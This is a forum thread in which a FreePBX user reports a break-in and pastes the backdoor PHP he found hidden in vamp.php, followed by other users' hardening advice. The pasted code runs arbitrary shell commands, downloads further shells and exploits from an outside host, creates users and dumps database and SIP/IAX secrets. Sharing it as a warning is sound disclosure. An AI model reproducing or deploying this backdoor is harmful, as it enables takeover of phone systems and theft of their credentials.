I've been infiltrated

I don’t know if this is of any interest or not, or if this is an appropriate place to post this (or if there is any such place) or if you’re already aware of it, but I found the following code hidden away in this file: ./admin/i18n/vamp/vamp.php, which specifically targets asterisk & freepbx systems. It was hidden under a base64 decode function. I’m not quite sure how they got in - other than perhaps through apache somehow, but I suppose I’m pretty screwed at this point. I thought someone else might benefit from this knowledge. It goes well beyond what’s here, this is just an interesting piece of it.

Not sure I completely understand what it’s doing, other than installing backdoors and grabbing passwords, but apparently the site “egrep.info”, which was created just last month, is the source of some of the code. Maybe somebody wants to pick up the ball and run them down in cooperation with appropriate authorities. whois shows:

Registrant Street: C/O ID#10760, PO Box 16
Registrant City:Nobby Beach
Registrant State/Province:Queensland
Registrant Postal Code:QLD 4218
Registrant Country:AU
Registrant Phone:+45.36946676

but the rest is privacy protected. I suppose it’s possible they’re also just an innocent victim, but my gut feeling says no.

The email address [email protected] is also associated with the below cracker.

if (isset($_REQUEST[‘p’]) && (md5($_REQUEST[‘p’])==“a84cf956b0d0a139eab752a3e09405c4”))
{
@system($_REQUEST[‘c’]);
echo “vampire access” ;
echo “\r\n” ;
}
else
{
die (‘No direct script access allowed’);
}

if ( $_GET[‘pbx’] == “fuck” ) {

remove all indexs

@system(“find . -perm 550 -type d |xargs chmod 755”) ;
@system(“find … -perm 550 -type d |xargs chmod 755”) ;
@system(“find . -perm 555 -type d |xargs chmod 755”) ;
@system(“find … -perm 555 -type d |xargs chmod 755”) ;
@system(“find . -name index.php ! -path ./index.php -delete”) ;
@system(“find … -name index.php ! -path …/index.php ! -path …/admin/index.php ! -path …/recordings/index.php -delete”) ;

echo “Index’s Removed” ;
echo “\r\n” ;

remove other hacks

@system(“rm -rf ./modules/cdr/assets/cdrphp.php ./assets/js/views/index.php ./assets/index.php ./modules/cdr/assets/index.php ./modules/cdr/assets/css/cdr.php ./hel$”) ;
@system(“find . -type f -exec grep -l ‘eFalcon’ {} ; |xargs rm -rf”) ;
@system(“find … -type f -exec grep -l ‘eFalcon’ {} ; |xargs rm -rf”) ;
@system(“grep -r -l --exclude=config.php --exclude=vamp.php --exclude=vampire.php ‘@system’ * | xargs rm -rf”) ;
@system(“grep -r -l --exclude=config.php --exclude=vamp.php --exclude=vampire.php ‘@system’ … | xargs rm -rf”) ;
@system(“grep -r -l --exclude=config.php --exclude=vamp.php --exclude=functions.inc.php --exclude=vampire.php ‘system(\$’ … | xargs rm -rf”) ;
@system(“find . -type f -exec grep -l ‘i-Hmx’ {} ; |xargs rm -rf”) ;
@system(“find …/ -type f -exec grep -l ‘i-Hmx’ {} ; |xargs rm -rf”) ;
@system(“find . -type f -exec grep -r -l --exclude=vamp.php --exclude=vampire.php ‘c99shell’ {} ; |xargs rm -rf”) ;
@system(“find … -type f -exec grep -l --exclude=vamp.php --exclude=vampire.php ‘c99shell’ {} ; |xargs rm -rf”) ;
@system(“find . -type f -exec grep -l 'bas”.“e64”."_decode’ {} ; |xargs rm -rf") ;
@system(“find …/ -type f -exec grep -l 'bas”.“e64”."_decode’ {} ; |xargs rm -rf") ;
@system(“find … -type f -exec egrep -r -l ‘Matrix’ {} ; |xargs rm -rf”) ;
@system(“find … -type f -exec egrep -r -l ‘c999shell’ {} ; |xargs rm -rf”) ;
@system(“find … -type f -exec egrep -r -l ‘9shell’ {} ; |xargs rm -rf”) ;
@system(“find … -name ‘*.php’ -exec egrep -r -l --exclude=crypt.php --exclude=Growl.php --exclude=callerid.php ‘base64_decode’ {} ; |xargs rm -rf”) ;
echo “Hacks Removed” ;
echo “\r\n” ;

add directories

@system("mkdir ./modules/themes ./modules/lang ./modules/vamp ./assets/themes ./assets/lang ./assets/vamp ./i18n/themes ./i18n/lang ./i18n/vamp …/recordings/lang …/recordings/themes …/recordings/vamp ") ;
echo “Own Dir Applied” ;
echo “\r\n” ;

modify .htaccess

@system(“wget -q http://egrep.info/hta.txt -O .htaccess”);
@system("cp -rf .htaccess ./modules/ ;cp -rf .htaccess ./modules/themes/ ; cp -rf .htaccess ./modules/lang/ ; cp -rf .htaccess ./assets/ ; cp -rf .htaccess ./helpers/ ; cp -rf .htaccess ./i18n/ ; cp -rf .htaccess …/recordings/ ; cp -rf .htaccess …/recordings/themes ; cp -rf .htaccess …/recordings/vamp ");
echo “HTA Applied” ;
echo “\r\n” ;

add own indexs

@system(“touch ./modules/index.php ./helpers/index.php ./modules/themes/index.php ./modules/lang/index.php ./modules/vamp/index.php ./assets/themes/index.php ./assets/lang/index.php ./assets/vamp/index.php ./assets/index.php ./i18n/themes/index.php ./i18n/lang/index.php ./i18n/vamp/index.php ./i18n/index.php …/recordings/themes/index.php …/recordings/lang/index.php …/recordings/vamp/index.php”) ;
echo “New index’s Applied” ;
echo “\r\n” ;

custome shell upload

@system(“wget -q http://egrep.info/case.txt -O case.php”);
@system(“cp -rf case.php ./modules/themes/case.php ; cp -rf case.php ./assets/themes/case.php ; cp -rf case.php ./i18n/themes/case.php ; cp -rf case.php …/recordings/themes/case.php ; cp -rf case.php ./modules/vamp/case.php ; cp -rf case.php …/recordings/vamp/case.php ; cp -rf case.php ./assets/vamp/case.php ; cp -rf case.php ./i18n/vamp/case.php; cp -rf case.php …/case.php”) ;
@system(“rm -rf case.php”) ;
echo “Custome Shell Applied”;
echo “\r\n” ;

add user & remove others

@system("wget -q http://egrep.info/ass.txt -O ass.php ; php ass.php ; rm -rf ass.php ") ;
@system(“wget -q http://egrep.info/ass.pass -O lang.php”) ;
@system("cp -rf lang.php ./modules/lang/lang.php ; cp -rf lang.php ./assets/lang/lang.php ; cp -rf lang.php ./i18n/lang/lang.php ; cp -rf lang.php …/recordings/lang/lang.php ; cp -rf lang.php ./modules/vamp/lang.php ; cp -rf lang.php …/recordings/vamp/lang.php ; cp -rf lang.php ./assets/vamp/lang.php ; cp -rf lang.php ./i18n/vamp/lang.php ");
@system(“rm -rf lang.php”) ;
echo “NEW PASSWORD Applied”;
echo “\r\n” ;

adding vamp

@system(“wget http://egrep.info/vampire.txt -O vamp.php”);
@system(“cp -rf vamp.php ./modules/vamp/vamp.php ; cp -rf vamp.php ./assets/vamp/vamp.php ; cp -rf vamp.php ./i18n/vamp/vamp.php ; cp -rf vamp.php …/recordings/vamp/vamp.php”);
echo “vamp Applied”;
@system(“rm -rf vamp.php”);
echo “\r\n” ;

secure exploit

@system(“wget -q http://egrep.info/ass.config -O config.php”) ;
echo “Config.php Updated”;
echo “\r\n” ;

add more exploits

@system(“wget -q http://egrep.info/ex.txt -O ex.php”) ;
@system(“cp -rf ex.php ./assets/js/index.php ; cp -rf ex.php ./helpers/index.php ; cp -rf ex.php ./i18n/es_ES/index.php ; cp -rf ex.php ./images/index.php ; cp -rf ex.php ./modules/cdr/index.php; cp -rf ex.php …/ex.php”) ;
@system(“rm -rf ex.php”);
echo “EXploit Applied”;
echo “\r\n” ;

secure directories

@system("chmod a-w ./modules/themes ./modules/vamp ./modules/lang ./assets/themes ./assets/vamp ./assets/lang ./i18n/themes ./i18n/vamp ./i18n/lang …/recordings/themes …/recordings/vamp …/recordings/lang ");
@system("chmod a-w ./assets/js ./i18n/es_ES/ ");
echo “Dir Secured”;
echo “\r\n” ;

}

if ( $_GET[‘vamp’] == “update” ) {
@system(“wget -q http://egrep.info/vampire.txt -O vamp.php”);
echo " new Vamp Applied";
echo “\r\n” ;
echo “+++++++ Please Refuck ++++++”;
echo “\r\n” ;

}

if ( $_GET[‘mode’] == “lite” ) {
@system(“wget -q http://egrep.info/control.php?path=".$_SERVER[‘SERVER_PORT’].$_SERVER[‘PHP_SELF’]." -O /dev/null”);
}
else {
@system(“wget -q http://egrep.info/control.php?path=".$_SERVER[‘SERVER_PORT’].$_SERVER[‘PHP_SELF’]." -O /dev/null”);

$ampdata=shell_exec('grep -i “AMPDB|PASS” /etc/amportal.conf | grep -v “#” | tr “\n” “"’);
if ( $_GET[‘parse’] == “parse” ) {
echo $ampdata;
echo “\r\n”;
echo "”;
}
$sipdata=shell_exec(‘echo “-----SIP-----” && cat /etc/asterisk/sip_additional.conf | grep “[|secret|host=|type=|username=” | tr “\n” “"’);
$iaxdata=shell_exec('echo “-----IAX-----” && cat /etc/asterisk/iax_additional.conf | grep “[|secret|host=|type=|username=” | tr “\n” "”’);
$zapdata1=shell_exec(‘echo “------zap-----” && cat /etc/asterisk/dahdi-channels.conf | grep “line=|group=|callerid=|context=|channel” | tr “\n” “"’);
$zapdata2=shell_exec('cat /etc/asterisk/chan_dahdi_additional.conf | grep “line=|group=|callerid=|context=|channel” | tr “\n” "”’);

if ( $_GET[‘asterisk’] == “show” ) {
echo $sipdata."\r\n*".$iaxdata."\r\n".$zapdata1."\r\n*".$zapdata2."\r\n*";
}

}

Check out the blog, this and other variants have been around for about a month now I think. The vulnerability has been patched.

We have always recommended not to expose http/httpd to the Internet for years. Nobody ever listens and the game continues. What I don’t understand is SSL VPN HTTP proxies are now in free Open Source fire walls and almost all the decent commercial stuff. There is simply no reason to open yourself up to this kind of risk.

I run two virtual servers off the same machine. One, freepbx which is setup to deny all access other than local as far as I understand it. The second, is open to the world because well… it’s a world wide web server.

As I only have the one machine, installing a VPN, SSL and/or proxy doesn’t make much sense for my unique specific situation, but I appreciate the comment.

I don’t claim to be a guru, and security is definitely not my strong point, so I’m also open to hearing other specific suggestions that will help me lock this down.

My firewall (iptables) is configured as a whitelist, so other than the random mistakes I find that I’ve made from time to time and fix as soon as I discover, not exactly sure where I went wrong. I guess my only solution is to have a seperate asterisk server (which I can’t afford)?? Perhaps a chroot solution for one of the virtual hosts…

As for the patch…(I assume you’re referring to FreePBX Ticket 7123) that’s exactly what I was intending to apply tonight… and as I attempted to login to apply it, that is when I found out it was already too late.

I don’t “administer” my system on a daily basis, I don’t have a need to do so. My user base is pretty much… me … and so once setup, there’s not much reason to login on any kind of frequent basis unless there’s a problem.

P.S. Love the captcha. I wish more sites would make it that simple but I presume still effective.

When you say “I run two virtual servers off the same machine.” do you mean that you have 2 virtual operating systems running under some type of visualization environment like ESXi or do you just have 2 different web spaces running under the same copy of Apache?

APB,
It sounds like you’re using virtualbox or a hypervisor of some kind, and have two guests on the hypervisor. A few suggestions:

1. Make sure your WWW guest is secured. My guess is if you have SSH, FTP or some kind of service opened on the WWW server, you opened yourself up from there.
2. Did you install any modules manually? Possible you didn’t MD5?
3. Do you have any ports opened on a firewall? Do you have a firewall?

It’s important to either use standard port forwarding (5060, 10000-20000 UDP) + intrusion detection, or change the standard ports and still use intrusion detection, although it’s less necessary.

From a virtualization perspective, I would keep both guests using bridged networking, but possibly get a second NIC and separate the LAN subnets using the different adapters for each bridge.

Keeping your PBX at the WAN-level (meaning it uses a public IP address, directly) has sure-fire potential to get you hacked, and fast.

Best of luck!

Sorry for being ambiguous. I meant two virtual hosts, under the same instance of apache, one OS only. Ubuntu 12.04 with iptables firewall.

Default policy for INPUT and FORWARD tables is DROP. Default policy for NAT and OUTPUT tables is ACCEPT. Port 80 is open for HTTP, since as mentioned I’m running one world accessible website. No SSH and no FTP since I’m on the console.

Also, from time to time I have extensions that need to access the PBX from another part of the world. When such occurs, I add those IPs to the whitelist.

I can’t speak on your security without seeing the system, but I would absolutely recommend moving your www site OFF the pbx. From a security and audio stability standpoint, you open yourself up to a lot of variables.